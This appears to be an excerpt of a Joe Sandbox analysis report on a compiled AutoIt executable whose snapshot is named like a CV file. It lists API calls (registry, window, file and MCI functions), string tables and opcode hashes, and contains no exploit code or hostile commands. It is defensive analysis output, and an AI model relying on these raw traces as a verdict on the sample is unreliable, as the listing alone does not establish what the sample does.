                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Foreground
                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                            • API String ID: 62970417-1919597938
                                                                                            • Opcode ID: 79fe539589506104c0fd63976e0fdfc23dd0eb305a0cf451f689cfa6ea3744c9
                                                                                            • Instruction ID: 63ea8a87590027428cb82d1a5ea17536ce2b261deee07c8b1a61f6c9647dc96c
                                                                                            • Opcode Fuzzy Hash: 79fe539589506104c0fd63976e0fdfc23dd0eb305a0cf451f689cfa6ea3744c9
                                                                                            • Instruction Fuzzy Hash: 75D19430108346DBCB18FF50C981AEEBBB1BF54344F104A2DF55A675A2DB30E99ADB91
                                                                                            APIs
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00123735
                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0015DC00,00000000,?,00000000,?,?), ref: 001237A3
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001237EB
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00123874
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00123B94
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00123BA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                            • API String ID: 536824911-966354055
                                                                                            • Opcode ID: a8aaf9bad9f47750b1982e9bc43119b4bfa4fa1ae89577fb156e12a7b470cc05
                                                                                            • Instruction ID: 2e220820562d335b6c376864f8464cce1fbd05766738ac6966c29f4d68af14f2
                                                                                            • Opcode Fuzzy Hash: a8aaf9bad9f47750b1982e9bc43119b4bfa4fa1ae89577fb156e12a7b470cc05
                                                                                            • Instruction Fuzzy Hash: C8025675200611AFCB14EF24D845E6EB7E5FF89720F04845DF99A9B2A2CB34EE51CB81
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00126C56
                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00126D16
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                            • API String ID: 3974292440-719923060
                                                                                            • Opcode ID: 5d7f34724f6433bf305facbf23675f49cbdea77cca07f62506ffed5f88a28f58
                                                                                            • Instruction ID: 373357def5046558887f688032f5a05e52eaaa00788fd11d68cb1a18bcba1ae4
                                                                                            • Opcode Fuzzy Hash: 5d7f34724f6433bf305facbf23675f49cbdea77cca07f62506ffed5f88a28f58
                                                                                            • Instruction Fuzzy Hash: 37A19C302143559BCB18EF20D951EAEB3A1BF94314F11496DB99A6B3D3DB30EC16CB91
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 000FCF91
                                                                                            • __swprintf.LIBCMT ref: 000FD032
                                                                                            • _wcscmp.LIBCMT ref: 000FD045
                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000FD09A
                                                                                            • _wcscmp.LIBCMT ref: 000FD0D6
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 000FD10D
                                                                                            • GetDlgCtrlID.USER32(?), ref: 000FD15F
                                                                                            • GetWindowRect.USER32(?,?), ref: 000FD195
                                                                                            • GetParent.USER32(?), ref: 000FD1B3
                                                                                            • ScreenToClient.USER32(00000000), ref: 000FD1BA
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 000FD234
                                                                                            • _wcscmp.LIBCMT ref: 000FD248
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 000FD26E
                                                                                            • _wcscmp.LIBCMT ref: 000FD282
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                            • String ID: %s%u
                                                                                            • API String ID: 3119225716-679674701
                                                                                            • Opcode ID: 90887e9bb876cc671a78734cc7d088719b2852ea0e0b3c47aa4df827a5514094
                                                                                            • Instruction ID: 0748dea940cb77892b1a261d7963e4e0854d629084f2647e4b06c9556674ece6
                                                                                            • Opcode Fuzzy Hash: 90887e9bb876cc671a78734cc7d088719b2852ea0e0b3c47aa4df827a5514094
                                                                                            • Instruction Fuzzy Hash: 13A1CE7120420AAFDB54DF60C884FFAB7E9FF54314F00862AFA9992590DB30EA45DBD1
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 000FD8EB
                                                                                            • _wcscmp.LIBCMT ref: 000FD8FC
                                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 000FD924
                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 000FD941
                                                                                            • _wcscmp.LIBCMT ref: 000FD95F
                                                                                            • _wcsstr.LIBCMT ref: 000FD970
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000FD9A8
                                                                                            • _wcscmp.LIBCMT ref: 000FD9B8
                                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 000FD9DF
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000FDA28
                                                                                            • _wcscmp.LIBCMT ref: 000FDA38
                                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 000FDA60
                                                                                            • GetWindowRect.USER32(00000004,?), ref: 000FDAC9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                            • String ID: @$ThumbnailClass
                                                                                            • API String ID: 1788623398-1539354611
                                                                                            • Opcode ID: b39d0948e0dbb21779da2fbe4e32e621d3a9bd6d89fc3713976f43cb9ad79a31
                                                                                            • Instruction ID: 3aca09d2c8520eaf0dd27274ece9e202d88c4e28f692edfd0caaa3014eebcf8b
                                                                                            • Opcode Fuzzy Hash: b39d0948e0dbb21779da2fbe4e32e621d3a9bd6d89fc3713976f43cb9ad79a31
                                                                                            • Instruction Fuzzy Hash: 4581CC310083499BDB01DF50C885FBA7BE9EF84314F04846BFE899A496DB70DD46DBA2
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wcsnicmp
                                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                            • API String ID: 1038674560-1810252412
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000063), ref: 000FEAB0
                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000FEAC2
                                                                                            • SetWindowTextW.USER32(?,?), ref: 000FEAD9
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 000FEAEE
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 000FEAF4
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 000FEB04
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 000FEB0A
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000FEB2B
                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000FEB45
                                                                                            • GetWindowRect.USER32(?,?), ref: 000FEB4E
                                                                                            • SetWindowTextW.USER32(?,?), ref: 000FEBB9
                                                                                            • GetDesktopWindow.USER32 ref: 000FEBBF
                                                                                            • GetWindowRect.USER32(00000000), ref: 000FEBC6
                                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000FEC12
                                                                                            • GetClientRect.USER32(?,?), ref: 000FEC1F
                                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000FEC44
                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000FEC6F
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                            • String ID:
                                                                                            • API String ID: 3869813825-0
                                                                                            APIs
                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 001179C6
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 001179D1
                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 001179DC
                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 001179E7
                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 001179F2
                                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 001179FD
                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00117A08
                                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00117A13
                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00117A1E
                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00117A29
                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00117A34
                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00117A3F
                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00117A4A
                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00117A55
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00117A60
                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00117A6B
                                                                                            • GetCursorInfo.USER32(?), ref: 00117A7B
                                                                                            Similarity
                                                                                            • API ID: Cursor$Load$Info
                                                                                            • String ID:
                                                                                            • API String ID: 2577412497-0
                                                                                            APIs
                                                                                              • Part of subcall function 000DE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000CC8B7,?,00002000,?,?,00000000,?,000C419E,?,?,?,0015DC00), ref: 000DE984
                                                                                              • Part of subcall function 000C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C53B1,?,?,000C61FF,?,00000000,00000001,00000000), ref: 000C662F
                                                                                            • __wsplitpath.LIBCMT ref: 000CC93E
                                                                                              • Part of subcall function 000E1DFC: __wsplitpath_helper.LIBCMT ref: 000E1E3C
                                                                                            • _wcscpy.LIBCMT ref: 000CC953
                                                                                            • _wcscat.LIBCMT ref: 000CC968
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 000CC978
                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000CCABE
                                                                                              • Part of subcall function 000CB337: _wcscpy.LIBCMT ref: 000CB36F
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                            • API String ID: 2258743419-1018226102
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 0012CEFB
                                                                                            • DestroyWindow.USER32(?,?), ref: 0012CF73
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0012CFF4
                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0012D016
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0012D025
                                                                                            • DestroyWindow.USER32(?), ref: 0012D042
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000C0000,00000000), ref: 0012D075
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0012D094
                                                                                            • GetDesktopWindow.USER32 ref: 0012D0A9
                                                                                            • GetWindowRect.USER32(00000000), ref: 0012D0B0
                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0012D0C2
                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0012D0DA
                                                                                              • Part of subcall function 000DB526: GetWindowLongW.USER32(?,000000EB), ref: 000DB537
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                            • String ID: 0$tooltips_class32
                                                                                            • API String ID: 3877571568-3619404913
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0012F37A
                                                                                              • Part of subcall function 0012D7DE: ClientToScreen.USER32(?,?), ref: 0012D807
                                                                                              • Part of subcall function 0012D7DE: GetWindowRect.USER32(?,?), ref: 0012D87D
                                                                                              • Part of subcall function 0012D7DE: PtInRect.USER32(?,?,0012ED5A), ref: 0012D88D
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0012F3E3
                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0012F3EE
                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0012F411
                                                                                            • _wcscat.LIBCMT ref: 0012F441
                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0012F458
                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0012F471
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0012F488
                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0012F4AA
                                                                                            • DragFinish.SHELL32(?), ref: 0012F4B1
                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0012F59C
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                            • API String ID: 169749273-3440237614
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0010AB3D
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0010AB46
                                                                                            • VariantClear.OLEAUT32(?), ref: 0010AB52
                                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0010AC40
                                                                                            • __swprintf.LIBCMT ref: 0010AC70
                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0010AC9C
                                                                                            • VariantInit.OLEAUT32(?), ref: 0010AD4D
                                                                                            • SysFreeString.OLEAUT32(00000016), ref: 0010ADDF
                                                                                            • VariantClear.OLEAUT32(?), ref: 0010AE35
                                                                                            • VariantClear.OLEAUT32(?), ref: 0010AE44
                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0010AE80
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                            • API String ID: 3730832054-3931177956
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 001271FC
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00127247
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                            • API String ID: 3974292440-4258414348
                                                                                            • Opcode ID: c1e72d6c95f524b6b0159b74e355bac881fd2cbb54f5e671210cabcdb2ac8c23
                                                                                            • Instruction ID: 6d58dca52981f8213144ded16ef2b8aab174502b990ecd79082ec37ed08141eb
                                                                                            • Opcode Fuzzy Hash: c1e72d6c95f524b6b0159b74e355bac881fd2cbb54f5e671210cabcdb2ac8c23
                                                                                            • Instruction Fuzzy Hash: FC916C342083519BCB04EF10D951AAEB7A1BF94310F00485DF9966B3E3DB30ED1ADB95
                                                                                            APIs
                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0012E5AB
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0012BEAF), ref: 0012E607
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0012E647
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0012E68C
                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0012E6C3
                                                                                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0012BEAF), ref: 0012E6CF
                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0012E6DF
                                                                                            • DestroyIcon.USER32(?,?,?,?,?,0012BEAF), ref: 0012E6EE
                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0012E70B
                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0012E717
                                                                                              • Part of subcall function 000E0FA7: __wcsicmp_l.LIBCMT ref: 000E1030
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                            • String ID: .dll$.exe$.icl
                                                                                            • API String ID: 1212759294-1154884017
                                                                                            • Opcode ID: b7ed8840572fc3e991df893763932c3f7d45274c0328c3258f7a862a793f38c7
                                                                                            • Instruction ID: ff5e97403efad2a57f84c61f2591fdf79ee97d7ba390ddeb473fd2a232d26bec
                                                                                            • Opcode Fuzzy Hash: b7ed8840572fc3e991df893763932c3f7d45274c0328c3258f7a862a793f38c7
                                                                                            • Instruction Fuzzy Hash: E161CF71500225BEEB24DF64EC46FFE7BB8BB18714F104115F915E61D1EBB099A0CBA0
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0010D292
                                                                                            • GetDriveTypeW.KERNEL32 ref: 0010D2DF
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0010D327
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0010D35E
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0010D38C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                            • API String ID: 1148790751-4113822522
                                                                                            • Opcode ID: e5c9a76d9caebf68b6f84b38d34a95db916db1c2e9b8025c06bcb51ebc3bddf7
                                                                                            • Instruction ID: 241e296038422a6ae5ef75b6a4c916a41bb42b6f2f334e015f9dccdbdf990fea
                                                                                            • Opcode Fuzzy Hash: e5c9a76d9caebf68b6f84b38d34a95db916db1c2e9b8025c06bcb51ebc3bddf7
                                                                                            • Instruction Fuzzy Hash: BE5118755043059FC700EF10D981EAEB7E4FF98758F04885DF89AA72A2DB71AE06CB52
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00133973,00000016,0000138C,00000016,?,00000016,0015DDB4,00000000,?), ref: 001026F1
                                                                                            • LoadStringW.USER32(00000000,?,00133973,00000016), ref: 001026FA
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00133973,00000016,0000138C,00000016,?,00000016,0015DDB4,00000000,?,00000016), ref: 0010271C
                                                                                            • LoadStringW.USER32(00000000,?,00133973,00000016), ref: 0010271F
                                                                                            • __swprintf.LIBCMT ref: 0010276F
                                                                                            • __swprintf.LIBCMT ref: 00102780
                                                                                            • _wprintf.LIBCMT ref: 00102829
                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00102840
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                            • API String ID: 618562835-2268648507
                                                                                            • Opcode ID: f48ff45fe32cb54e5ec934b875dbc02d891f48c8f0860361052b70369430b237
                                                                                            • Instruction ID: 676aaa05bd777fc11dde28b90179a320f335c573870afb13ea9467c6c4e90e5e
                                                                                            • Opcode Fuzzy Hash: f48ff45fe32cb54e5ec934b875dbc02d891f48c8f0860361052b70369430b237
                                                                                            • Instruction Fuzzy Hash: EC414A72800218AADB14FBE0DD8AEEEB778AF25340F144069F505760A3EB706F49DB61
                                                                                            APIs
                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0010D0D8
                                                                                            • __swprintf.LIBCMT ref: 0010D0FA
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0010D137
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0010D15C
                                                                                            • _memset.LIBCMT ref: 0010D17B
                                                                                            • _wcsncpy.LIBCMT ref: 0010D1B7
                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0010D1EC
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0010D1F7
                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0010D200
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0010D20A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                            • String ID: :$\$\??\%s
                                                                                            • API String ID: 2733774712-3457252023
                                                                                            • Opcode ID: ac61f48bcc4a9ff3f1c8d95123e21a15393da71bb5cb46146708e0e43a45cb19
                                                                                            • Instruction ID: c44a301f49ce5eb03bb13b9e83ffd80bc1e482771f04c6b9f27c4c0864c7b037
                                                                                            • Opcode Fuzzy Hash: ac61f48bcc4a9ff3f1c8d95123e21a15393da71bb5cb46146708e0e43a45cb19
                                                                                            • Instruction Fuzzy Hash: 073194B6500109ABDB21DFA1EC49FEF77BDEF89740F1040B6F549D21A1EBB096858B24
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0012BEF4,?,?), ref: 0012E754
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E76B
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E776
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E783
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0012E78C
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E79B
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0012E7A4
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E7AB
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0012BEF4,?,?,00000000,?), ref: 0012E7BC
                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0014D9BC,?), ref: 0012E7D5
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0012E7E5
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0012E809
                                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0012E834
                                                                                            • DeleteObject.GDI32(00000000), ref: 0012E85C
                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0012E872
